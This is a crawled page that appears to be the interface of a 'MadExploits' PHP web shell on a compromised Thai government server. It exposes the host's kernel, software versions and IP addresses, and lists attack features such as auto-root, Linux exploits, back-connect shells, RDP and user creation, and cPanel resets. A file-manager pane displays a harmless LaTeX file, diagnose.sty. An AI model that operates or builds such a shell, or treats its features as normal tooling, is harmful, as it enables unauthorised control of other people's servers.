Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
texmf /
tex /
latex /
diagnose /
[ HOME SHELL ]
Name
Size
Permission
Action
diagnose.sty
1.68
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : diagnose.sty
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % File: diagnose.sty % Author: Oliver Corff % Date: April 10, 2001 % Version: 0.2 % Copyright: Ulaanbaatar, Beijing, Berlin, Shanghai % % Description: Diagnostic Functions % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % ------------------- identification ------------------- \ProvidesFile{diagnose.sty} [2000/11/01 v0.2 Diagnostic Utility] \newif\ifmessagetext \newcommand{\TextMessageNo}{ \messagetextfalse } \newcommand{\TextMessageYes}{ \messagetexttrue } \newcommand{\TextMessage}[1]{% \ifmessagetext % #1% \fi % } \newcommand{\TokenDiagnostics}[4]{% \newcounter{#2}% % Counter name \ifx#1\undefined % Token name \setcounter{#2}{0}% % `No' assignment to counter \TextMessage{#4}% % `No' text in document \message{^^J#4^^J^^J}% % `No' text in message and log file \else % \setcounter{#2}{1}% % `Yes' assignment to counter \TextMessage{#3}% % `Yes' text in document \message{^^J#3^^J^^J}% % `Yes' text in message and log file \fi % } \newcommand{\PackageDiagnostics}[4]{% \newcounter{#2}% % Counter name \IfFileExists{#1}{% % Package name \setcounter{#2}{1}% % `Yes' assignment to counter \TextMessage{#3}% % `Yes' text in document \message{^^J#3^^J^^J}% % `Yes' text in message and log file } % {\setcounter{#2}{0}% % `No' assignment to counter \TextMessage{#4}% % `No' text in document \message{^^J#4^^J^^J}% % `No' text in message and log file } } %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \TextMessageNo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \endinput % End of package diagnose.sty
Close